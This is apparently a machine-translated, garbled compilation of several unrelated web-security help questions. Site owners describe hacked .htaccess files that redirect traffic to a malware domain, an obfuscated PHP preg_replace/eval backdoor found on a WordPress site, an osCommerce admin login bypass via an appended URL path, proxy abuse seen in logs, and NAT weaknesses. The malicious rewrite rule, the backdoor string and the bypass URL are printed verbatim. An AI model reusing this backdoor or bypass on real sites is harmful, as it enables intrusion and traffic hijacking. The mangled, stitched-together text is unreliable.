黑客在.htaccess文件中添加了一个代码,将所有search引擎stream量redirect到恶意软件网站。 我现在正在调查这个事件,并试图找出安全漏洞。 我的情况几乎和这个人的.htaccess被屡次黑客相似 以下是来自FTP日志的一个插入尝试示例 – Aug 6 02:43:31 sg2nlftpg002 [30887]: ([email protected]) [INFO] FTPUSER is now logged in Aug 6 09:43:33 sg2nlftpg002 [30887]: ([email protected]) [NOTICE] /home/content/81/7838581/html//.htaccess downloaded (846 bytes, 106.37KB/sec) Aug 6 09:43:35 sg2nlftpg002 [30887]: ([email protected]) [NOTICE] /home/content/81/7838581/html//.htaccess uploaded (1435 bytes, 3.32KB/sec) Aug 6 09:43:35 sg2nlftpg002 [30887]: ([email protected]) [INFO] Logout. 这与我的常规login企图有很大的不同 – Aug 7 10:57:53 sg2nlftpg002 […]
我在access.log中遇到以下条目: 58.218.199.147 – – [05/Jun/2012:12:56:04 +1000] "GET http://proxyproxys.com/ HTTP/1.1" 200 183 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 通常,当我在access.log中看到完整的URL条目时,我认为它是日志垃圾邮件,有人试图让我访问他们的网站。 这些条目通常跟着一个404响应。 上面的条目是200个“成功”的回应! 做一些search似乎这可能会发生时,有人试图使用您的服务器作为代理。 这更让我感到不安 – 尤其是因为这个url中有代理字。 去网站“proxyproxys.com”(使用hidemyass.com保护我自己的身份),网站返回似乎是某种“代理法官” —————————————- HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8 HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.53 Safari/536.5 HTTP_CONNECTION=close REMOTE_PORT=56355 REMOTE_HOST=74.63.112.142 REMOTE_ADDR=74.63.112.142 —————————————- CS_ProxyJudge Result=HIGH_ANONYMITY —————————————- 问题:1)200的成功意味着有人能够成功地使用我的服务器作为代理? 2)是否有其他方式来确认我的服务器是否被用作代理服务器?3)如果存在安全漏洞,您可以向我推荐文档以帮助“closures”我的安全漏洞。 谢谢。
networking地址转换(Network Address Translation,NAT)似乎是对后面主机的防火墙,因为它们不可用。 虽然我永远不会依赖这个作为我的防火墙,但它作为防火墙的失败是什么? 我正在问这个我称之为“学术”的原因。 我知道NAT不会保护人们进入防火墙设备本身,而且更多层次的安全性更好。 我更感兴趣的是如果NAT被用于这个目的,NAT本身如何被利用。 更新,例如: 一个公共IP:10.10.10.10 一个局域网:192.168.1.1/24 如果所有来自局域网的传出通信都具有去往10.10.10.10的传出NAT,并且唯一的其他NAT映射是10.10.10.10端口80映射到192.168.1.100。 如何访问192.168.1.50端口22?
我在客户端的WordPress驱动的网站上发现了一个有问题的string,我只是想知道它做了什么。 @preg_replace("\x40\50\x2e\53\x29\100\x69\145","\x65\166\x61\154\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b","\x4c\62\x68\166\x62\127\x55\166\x64\62\x56\151\x4c\63\x56\172\x5a\130\x4a\172\x4c\172\x49\167\x4d\152\x6b\165\x59\155\x6c\156\x4e\151\x39\172\x61\130\x52\154\x63\171\x39\151\x61\127\x63\62\x4c\63\x42\61\x59\155\x78\160\x59\61\x39\157\x64\107\x31\163\x4c\62\x5a\166\x63\156\x56\164\x4c\62\x4a\151\x4c\127\x6c\165\x59\62\x78\61\x5a\107\x56\172\x4c\62\x70\172\x4c\62\x70\170\x64\127\x56\171\x65\123\x38\165\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75"); 有人可以概述解码这个步骤吗? 我知道preg_replace()是什么,但我不知道如何解码函数的参数,或者PHP如何处理它可以利用的东西。
访问以下所有内容会将您转到login屏幕: http://mysite.com/admin/configuration.php http://mysite.com/admin/login.php 但是,如果您访问(请注意URLstring的最后两部分都是.php): http://mysite.com/admin/configuration.php/login.php 您可以看到configuration屏幕及其所有数据! 此外,如果你附加一些GETvariables,你甚至可以得到可编辑的字段: http://mysite.com/admin/configuration.php/login.php?cID=1&action=edit 这里发生了什么? 我应该注意,这是在网站上使用一个绝对可怕的购物车叫做oscommerce。 代码是一个噩梦来处理,但我现在坚持下去。 编辑 基于下面的vstm的出色和准确的评论的修复: 这将会在检查前看到$current_page != FILENAME_LOGIN (在/admin/includes/application_top.php的第141-143行左右)。 请注意,这只是一个紧急补丁,因为真正的解决scheme是永远不要使用oscommerce,因为它和妓女的腰带一样安全。 //$current_page = basename($PHP_SELF); //this is the default $current_page = basename($_SERVER['SCRIPT_NAME']); //change that default to this if ( ($current_page == FILENAME_LOGIN) && !tep_session_is_registered('redirect_origin') ) { $current_page = FILENAME_DEFAULT; $HTTP_GET_VARS = array(); } 如果有人试图这样做,不要忘记, redirect_origin会话var可能已经被设置,所以这似乎不起作用。 只需取消设置,然后重试。
随着谷歌和其他人的消息被黑客攻击,我想知道公司是如何发现,检测和/或知道他们已经被黑客入侵的? 当然,如果他们在用户的计算机上发现病毒/特洛伊木马,或者看到他们的系统部分访问率非常高,通常看不到很多(如果有的话)stream量。 但是,从我看到的文章来看,这次攻击相当“复杂”,所以我不会想象黑客会首先把黑客攻击变得如此明显。 也许有人可以启发我当前的检测scheme/启发式。 谢谢。
我想听听真实的故事,你的Linux机箱/服务器是如何被黑客入侵的,以及你不会再陷入同一个漏洞。
在Fedora上,根目录是无效的。 什么是解决scheme?
我们运营一个托pipe大约300个网站的网站服务器。 昨天早上,一个脚本在大多数(但不是全部)站点的document_root下的每个目录中都放置了.htaccess文件,这些文件由www-data(apache用户)拥有。 .htaccess文件的内容是这样的: RewriteEngine On RewriteCond %{HTTP_REFERER} ^http:// RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR} 谷歌search该url(这是“杀毒软件”的md5哈希),我发现这一切都发生在互联网上,并正在寻找已经处理这个问题的人,并确定漏洞是在哪里 。 我搜查了大部分日志,但还没有发现任何结论。 有没有其他人经历过比我更深入的洞察? 到目前为止我们已经确定: 所做的更改是作为万维网数据,所以Apache或它的插件可能是罪魁祸首 所有的改变都是在15分钟内完成的,所以可能是自动的 由于我们的网站域名广泛不同,我认为一个网站上的单个漏洞是负责任的(而不是每个网站上的常见漏洞) 如果一个.htaccess文件已经存在,并且可以通过www-data写入,那么脚本就很实用,并且简单地将上面的代码行附加到文件的末尾(使其易于反转) 任何更多的提示将不胜感激。 == ==编辑 对于那些需要它的人,这里是我用来清理.htaccess文件的脚本: #!/bin/bash PATT=84f6a4eef61784b33e4acbd32c8fdd72.com DIR=/mnt TMP=/tmp/`mktemp "XXXXXX"` find $DIR -name .htaccess|while read FILE; do if ( grep $PATT "$FILE" > /dev/null); then if [ `cat "$FILE"|wc -l` -eq 4 ]; […]
我有一位客户要求我尝试分析一个网站的漏洞。 发生的事情是,每个周末左右,数据库中一张表的一条logging的字段每次都变成同一个东西。 从Jewelry到Jewelery <a href="http://[**REMOVED-FOR-SF**]/viewPress?press_id=407">[**REMOVED-FOR-SF**]</a><a href="http://[**REMOVED-FOR-SF**]/[**REMOVED-FOR-SF**].html">[**REMOVED-FOR-SF**]</a> 。 事实上,它始终是相同的logging,使我认为这是一种自动脚本,但如果是这样,我找不到它。 以下已经完成: 修复了SQL注入漏洞 阻止777个目录中的PHP执行 每次修复后更改数据库密码 每次修复后都更改了CMS密码 下一步是什么?